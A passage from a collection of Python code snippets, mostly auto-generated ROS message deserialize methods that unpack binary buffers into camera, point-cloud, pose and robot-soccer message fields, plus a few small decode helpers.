_struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v44.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v44.frame_id = str[start:end]\n _x = _v43\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v43.fields = []\n for i in range(0, length):\n val4 = sensor_msgs.msg.PointField()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val4.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val4.name = str[start:end]\n _x = val4\n start = end\n end += 9\n (_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])\n _v43.fields.append(val4)\n _x = _v43\n start = end\n end += 9\n (_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])\n _v43.is_bigendian = bool(_v43.is_bigendian)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v43.data = str[start:end]\n start = end\n end += 1\n (_v43.is_dense,) = _get_struct_B().unpack(str[start:end])\n _v43.is_dense = bool(_v43.is_dense)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n _v42.mask = s.unpack(str[start:end])\n _v46 = _v42.image\n _v47 = _v46.header\n start = end\n end += 4\n (_v47.seq,) = _get_struct_I().unpack(str[start:end])\n _v48 = _v47.stamp\n _x = _v48\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v47.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v47.frame_id = str[start:end]\n _x = _v46\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v46.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v46.encoding = str[start:end]\n _x = _v46\n start = end\n end += 5\n (_x.is_bigendian, _x.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v46.data = str[start:end]\n _v49 = _v42.disparity_image\n _v50 = _v49.header\n start = end\n end += 4\n (_v50.seq,) = _get_struct_I().unpack(str[start:end])\n _v51 = _v50.stamp\n _x = _v51\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v50.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v50.frame_id = str[start:end]\n _x = _v49\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v49.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v49.encoding = str[start:end]\n _x = _v49\n start = end\n end += 5\n (_x.is_bigendian, _x.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v49.data = str[start:end]\n _v52 = _v42.cam_info\n _v53 = _v52.header\n start = end\n end += 4\n (_v53.seq,) = _get_struct_I().unpack(str[start:end])\n _v54 = _v53.stamp\n _x = _v54\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v53.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v53.frame_id = str[start:end]\n _x = _v52\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v52.distortion_model = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v52.distortion_model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n _v52.D = s.unpack(str[start:end])\n start = end\n end += 72\n _v52.K = _get_struct_9d().unpack(str[start:end])\n start = end\n end += 72\n _v52.R = _get_struct_9d().unpack(str[start:end])\n start = end\n end += 96\n _v52.P = _get_struct_12d().unpack(str[start:end])\n _x = _v52\n start = end\n end += 8\n (_x.binning_x, _x.binning_y,) = _get_struct_2I().unpack(str[start:end])\n _v55 = _v52.roi\n _x = _v55\n start = end\n end += 17\n (_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify,) = _get_struct_4IB().unpack(str[start:end])\n _v55.do_rectify = bool(_v55.do_rectify)\n _v56 = _v42.roi_box_pose\n _v57 = _v56.header\n start = end\n end += 4\n (_v57.seq,) = _get_struct_I().unpack(str[start:end])\n _v58 = _v57.stamp\n _x = _v58\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v57.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v57.frame_id = str[start:end]\n _v59 = _v56.pose\n _v60 = _v59.position\n _x = _v60\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v61 = _v59.orientation\n _x = _v61\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n _v62 = _v42.roi_box_dims\n _x = _v62\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.collision_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.collision_name = str[start:end]\n self.graspable_objects.append(val1)\n _x = self\n start = end\n end += 12\n (_x.image.header.seq, _x.image.header.stamp.secs, _x.image.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.image.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.image.height, _x.image.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.image.encoding = str[start:end]\n _x = self\n start = end\n end += 5\n (_x.image.is_bigendian, _x.image.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.image.data = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.camera_info.header.seq, _x.camera_info.header.stamp.secs, _x.camera_info.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_info.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.camera_info.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.camera_info.height, _x.camera_info.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_info.distortion_model = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.camera_info.distortion_model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.camera_info.D = s.unpack(str[start:end])\n start = end\n end += 72\n self.camera_info.K = _get_struct_9d().unpack(str[start:end])\n start = end\n end += 72\n self.camera_info.R = _get_struct_9d().unpack(str[start:end])\n start = end\n end += 96\n self.camera_info.P = _get_struct_12d().unpack(str[start:end])\n _x = self\n start = end\n end += 25\n (_x.camera_info.binning_x, _x.camera_info.binning_y, _x.camera_info.roi.x_offset, _x.camera_info.roi.y_offset, _x.camera_info.roi.height, _x.camera_info.roi.width, _x.camera_info.roi.do_rectify,) = _get_struct_6IB().unpack(str[start:end])\n self.camera_info.roi.do_rectify = bool(self.camera_info.roi.do_rectify)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.meshes = []\n for i in range(0, length):\n val1 = shape_msgs.msg.Mesh()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.triangles = []\n for i in range(0, length):\n val2 = shape_msgs.msg.MeshTriangle()\n start = end\n end += 12\n val2.vertex_indices = _get_struct_3I().unpack(str[start:end])\n val1.triangles.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.vertices = []\n for i in range(0, length):\n val2 = geometry_msgs.msg.Point()\n _x = val2\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n val1.vertices.append(val2)\n self.meshes.append(val1)\n _x = self\n start = end\n end += 56\n (_x.reference_to_camera.position.x, _x.reference_to_camera.position.y, _x.reference_to_camera.position.z, _x.reference_to_camera.orientation.x, _x.reference_to_camera.orientation.y, _x.reference_to_camera.orientation.z, _x.reference_to_camera.orientation.w,) = _get_struct_7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.goal_id is None:\n self.goal_id = actionlib_msgs.msg.GoalID()\n if self.goal is None:\n self.goal = coordinator.msg.ManipTaskGoal()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal_id.id = str[start:end]\n _x = self\n start = end\n end += 20\n (_x.goal.action_code, _x.goal.object_code, _x.goal.pickup_frame.header.seq, _x.goal.pickup_frame.header.stamp.secs, _x.goal.pickup_frame.header.stamp.nsecs,) = _get_struct_2i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.pickup_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.pickup_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.goal.pickup_frame.pose.position.x, _x.goal.pickup_frame.pose.position.y, _x.goal.pickup_frame.pose.position.z, _x.goal.pickup_frame.pose.orientation.x, _x.goal.pickup_frame.pose.orientation.y, _x.goal.pickup_frame.pose.orientation.z, _x.goal.pickup_frame.pose.orientation.w, _x.goal.dropoff_frame.header.seq, _x.goal.dropoff_frame.header.stamp.secs, _x.goal.dropoff_frame.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.dropoff_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.dropoff_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.goal.dropoff_frame.pose.position.x, _x.goal.dropoff_frame.pose.position.y, _x.goal.dropoff_frame.pose.position.z, _x.goal.dropoff_frame.pose.orientation.x, _x.goal.dropoff_frame.pose.orientation.y, _x.goal.dropoff_frame.pose.orientation.z, _x.goal.dropoff_frame.pose.orientation.w, _x.goal.gripper_goal_frame.header.seq, _x.goal.gripper_goal_frame.header.stamp.secs, _x.goal.gripper_goal_frame.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.gripper_goal_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.gripper_goal_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 60\n (_x.goal.gripper_goal_frame.pose.position.x, _x.goal.gripper_goal_frame.pose.position.y, _x.goal.gripper_goal_frame.pose.position.z, _x.goal.gripper_goal_frame.pose.orientation.x, _x.goal.gripper_goal_frame.pose.orientation.y, _x.goal.gripper_goal_frame.pose.orientation.z, _x.goal.gripper_goal_frame.pose.orientation.w, _x.goal.perception_source,) = _get_struct_7di().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def _from_string(cls, serialized):\r\n parse = cls.parse_url(serialized)\r\n\r\n if parse['version_guid']:\r\n parse['version_guid'] = cls.as_object_id(parse['version_guid'])\r\n\r\n return cls(**{key: parse.get(key) for key in cls.KEY_FIELDS})", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.pan is None:\n self.pan = movo_msgs.msg.PanTiltActuatorFdbk()\n if self.tilt is None:\n self.tilt = movo_msgs.msg.PanTiltActuatorFdbk()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.pan.header.seq, _x.pan.header.stamp.secs, _x.pan.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.pan.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.pan.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 64\n (_x.pan.current, _x.pan.pos_rad, _x.pan.vel_rps, _x.pan.torque_nm, _x.pan.pwm, _x.pan.encoder_rad, _x.pan.accel.x, _x.pan.accel.y, _x.pan.accel.z, _x.pan.temperature_degC, _x.tilt.header.seq, _x.tilt.header.stamp.secs, _x.tilt.header.stamp.nsecs,) = _struct_6f3df3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.tilt.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.tilt.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 52\n (_x.tilt.current, _x.tilt.pos_rad, _x.tilt.vel_rps, _x.tilt.torque_nm, _x.tilt.pwm, _x.tilt.encoder_rad, _x.tilt.accel.x, _x.tilt.accel.y, _x.tilt.accel.z, _x.tilt.temperature_degC,) = _struct_6f3df.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (self.yaw,) = _struct_f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def decode(self, s):", "def decode(self, s):", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.Hlines is None:\n self.Hlines = None\n if self.Vlines is None:\n self.Vlines = None\n if self.regions is None:\n self.regions = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 4\n (_x.image_width, _x.image_height,) = _get_struct_2H().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.Hlines = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.Hlines.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.Vlines = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.Vlines.append(val1)\n start = end\n end += 2\n (self.PFPS,) = _get_struct_H().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.regions = []\n for i in range(0, length):\n val1 = cooperative_driving_vision.msg.Region()\n _v3 = val1.color\n _x = _v3\n start = end\n end += 16\n (_x.r, _x.g, _x.b, _x.a,) = _get_struct_4f().unpack(str[start:end])\n _v4 = val1.moment\n _x = _v4\n start = end\n end += 40\n (_x.m00, _x.m10, _x.m01, _x.m11, _x.m20, _x.m02, _x.m21, _x.m12, _x.m30, _x.m03,) = _get_struct_10f().unpack(str[start:end])\n self.regions.append(val1)\n _x = self\n start = end\n end += 4\n (_x.box_width, _x.box_height,) = _get_struct_2H().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.c0 is None:\n self.c0 = bh_motion.msg.Vector3()\n if self.c1 is None:\n self.c1 = bh_motion.msg.Vector3()\n if self.c2 is None:\n self.c2 = bh_motion.msg.Vector3()\n end = 0\n _x = self\n start = end\n end += 36\n (_x.c0.x, _x.c0.y, _x.c0.z, _x.c1.x, _x.c1.y, _x.c1.z, _x.c2.x, _x.c2.y, _x.c2.z,) = _struct_9f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.des_gripper_pose is None:\n self.des_gripper_pose = geometry_msgs.msg.PoseStamped()\n if self.object_pose is None:\n self.object_pose = geometry_msgs.msg.PoseStamped()\n end = 0\n _x = self\n start = end\n end += 20\n (_x.manip_return_code, _x.object_grabber_return_code, _x.des_gripper_pose.header.seq, _x.des_gripper_pose.header.stamp.secs, _x.des_gripper_pose.header.stamp.nsecs,) = _get_struct_2i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.des_gripper_pose.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.des_gripper_pose.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 72\n (_x.des_gripper_pose.pose.position.x, _x.des_gripper_pose.pose.position.y, _x.des_gripper_pose.pose.position.z, _x.des_gripper_pose.pose.orientation.x, _x.des_gripper_pose.pose.orientation.y, _x.des_gripper_pose.pose.orientation.z, _x.des_gripper_pose.pose.orientation.w, _x.object_finder_return_code, _x.object_pose.header.seq, _x.object_pose.header.stamp.secs, _x.object_pose.header.stamp.nsecs,) = _get_struct_7di3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object_pose.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.object_pose.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.object_pose.pose.position.x, _x.object_pose.pose.position.y, _x.object_pose.pose.position.z, _x.object_pose.pose.orientation.x, _x.object_pose.pose.orientation.y, _x.object_pose.pose.orientation.z, _x.object_pose.pose.orientation.w,) = _get_struct_7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.obstacleinfo is None:\n self.obstacleinfo = nubot_common.msg.ObstaclesInfo()\n if self.oppinfo is None:\n self.oppinfo = nubot_common.msg.ObstaclesInfo()\n if self.robotinfo is None:\n self.robotinfo = None\n if self.ballinfo is None:\n self.ballinfo = None\n if self.coachinfo is None:\n self.coachinfo = nubot_common.msg.CoachInfo()\n if self.pass_cmd is None:\n self.pass_cmd = nubot_common.msg.PassCommands()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.obstacleinfo.header.seq, _x.obstacleinfo.header.stamp.secs, _x.obstacleinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.obstacleinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.obstacleinfo.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.obstacleinfo.pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.Point2d()\n _x = val1\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.obstacleinfo.pos.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.obstacleinfo.polar_pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.PPoint()\n _x = val1\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n self.obstacleinfo.polar_pos.append(val1)\n _x = self\n start = end\n end += 12\n (_x.oppinfo.header.seq, _x.oppinfo.header.stamp.secs, _x.oppinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.oppinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.oppinfo.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.oppinfo.pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.Point2d()\n _x = val1\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.oppinfo.pos.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.oppinfo.polar_pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.PPoint()\n _x = val1\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n self.oppinfo.polar_pos.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.robotinfo = []\n for i in range(0, length):\n val1 = nubot_common.msg.RobotInfo()\n _v12 = val1.header\n start = end\n end += 4\n (_v12.seq,) = _get_struct_I().unpack(str[start:end])\n _v13 = _v12.stamp\n _x = _v13\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v12.frame_id = str[start:end].decode('utf-8')\n else:\n _v12.frame_id = str[start:end]\n _x = val1\n start = end\n end += 28\n (_x.AgentID, _x.targetNum1, _x.targetNum2, _x.targetNum3, _x.targetNum4, _x.staticpassNum, _x.staticcatchNum,) = _get_struct_7i().unpack(str[start:end])\n _v14 = val1.pos\n _x = _v14\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _v15 = val1.heading\n start = end\n end += 4\n (_v15.theta,) = _get_struct_f().unpack(str[start:end])\n start = end\n end += 4\n (val1.vrot,) = _get_struct_f().unpack(str[start:end])\n _v16 = val1.vtrans\n _x = _v16\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _x = val1\n start = end\n end += 9\n (_x.iskick, _x.isvalid, _x.isstuck, _x.isdribble, _x.current_role, _x.role_time,) = _get_struct_5Bf().unpack(str[start:end])\n val1.iskick = bool(val1.iskick)\n val1.isvalid = bool(val1.isvalid)\n val1.isstuck = bool(val1.isstuck)\n val1.isdribble = bool(val1.isdribble)\n _v17 = val1.target\n _x = _v17\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.robotinfo.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.ballinfo = []\n for i in range(0, length):\n val1 = nubot_common.msg.BallInfo()\n _v18 = val1.header\n start = end\n end += 4\n (_v18.seq,) = _get_struct_I().unpack(str[start:end])\n _v19 = _v18.stamp\n _x = _v19\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v18.frame_id = str[start:end].decode('utf-8')\n else:\n _v18.frame_id = str[start:end]\n start = end\n end += 4\n (val1.ballinfostate,) = _get_struct_i().unpack(str[start:end])\n _v20 = val1.pos\n _x = _v20\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _v21 = val1.real_pos\n _x = _v21\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n _v22 = val1.velocity\n _x = _v22\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _x = val1\n start = end\n end += 2\n (_x.pos_known, _x.velocity_known,) = _get_struct_2B().unpack(str[start:end])\n val1.pos_known = bool(val1.pos_known)\n val1.velocity_known = bool(val1.velocity_known)\n self.ballinfo.append(val1)\n _x = self\n start = end\n end += 12\n (_x.coachinfo.header.seq, _x.coachinfo.header.stamp.secs, _x.coachinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.coachinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.coachinfo.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 54\n (_x.coachinfo.MatchMode, _x.coachinfo.MatchType, _x.coachinfo.TestMode, _x.coachinfo.pointA.x, _x.coachinfo.pointA.y, _x.coachinfo.pointB.x, _x.coachinfo.pointB.y, _x.coachinfo.angleA, _x.coachinfo.angleB, _x.coachinfo.idA, _x.coachinfo.idB, _x.coachinfo.kickforce, _x.pass_cmd.pass_id, _x.pass_cmd.catch_id, _x.pass_cmd.pass_pt.x, _x.pass_cmd.pass_pt.y, _x.pass_cmd.catch_pt.x, _x.pass_cmd.catch_pt.y, _x.pass_cmd.is_passout, _x.pass_cmd.is_dynamic_pass, _x.pass_cmd.is_static_pass, _x.pass_cmd.is_valid,) = _get_struct_3B4f2h3B2I4f4B().unpack(str[start:end])\n self.pass_cmd.is_passout = bool(self.pass_cmd.is_passout)\n self.pass_cmd.is_dynamic_pass = bool(self.pass_cmd.is_dynamic_pass)\n self.pass_cmd.is_static_pass = bool(self.pass_cmd.is_static_pass)\n self.pass_cmd.is_valid = bool(self.pass_cmd.is_valid)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def unpack(msg_bytes):\n canid, dlc, data = struct.unpack(CANMessage.msg_fmt, msg_bytes)\n msg = CANMessage(canid, data, dlc)\n return msg", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 24\n self.thumb = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.index = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.middle = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.ring = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.little = _get_struct_3d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def _decode_str(self, buf):\n length = self._decode_vint(buf)\n result = buf.read(length)\n if len(result) != length:\n raise EndOfMessage(True)\n return result", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 44\n (_x.date, _x.time, _x.longitude_RTK, _x.latitude_RTK, _x.height_above_sea_RTK, _x.velocity_north, _x.velocity_east, _x.velocity_ground, _x.yaw, _x.position_flag, _x.yaw_flag,) = _struct_2I2d4fh2B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (self.numberOfTSPTurtles,) = _get_struct_i().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def _to_jsonrpc_obj(self, jsonrpcstr):\n return jsonrpc.JsonRpcData.parse(jsonrpcstr)", "def deserialize(self, str):\n try:\n if self.base is None:\n self.base = rwrc12_msgs.msg.CellBase()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.base.header.seq, _x.base.header.stamp.secs, _x.base.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.base.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.base.header.frame_id = 